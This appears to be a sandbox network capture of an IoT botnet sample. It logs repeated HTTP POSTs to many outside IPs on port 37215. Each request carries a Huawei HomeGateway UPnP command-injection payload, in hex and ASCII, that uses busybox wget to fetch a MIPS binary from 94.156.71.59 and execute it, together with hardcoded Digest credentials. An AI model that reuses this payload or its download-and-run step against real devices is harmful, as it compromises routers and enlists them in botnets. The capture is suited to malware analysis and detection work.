                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            152192.168.2.1337368156.90.232.11737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.999496937 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            153192.168.2.1342520156.225.196.1837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.000374079 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            154192.168.2.1337376156.15.16.18637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.001255035 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            155192.168.2.135440241.63.241.2737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.002136946 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            156192.168.2.1334412156.156.74.7437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.002985001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            157192.168.2.1333756197.244.78.20637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.003802061 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            158192.168.2.1353414156.38.108.6637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.004662037 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            159192.168.2.1353026197.57.68.10037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.005516052 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            160192.168.2.1345572197.67.118.3237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.006376982 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            161192.168.2.135353841.236.7.2537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.007220030 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
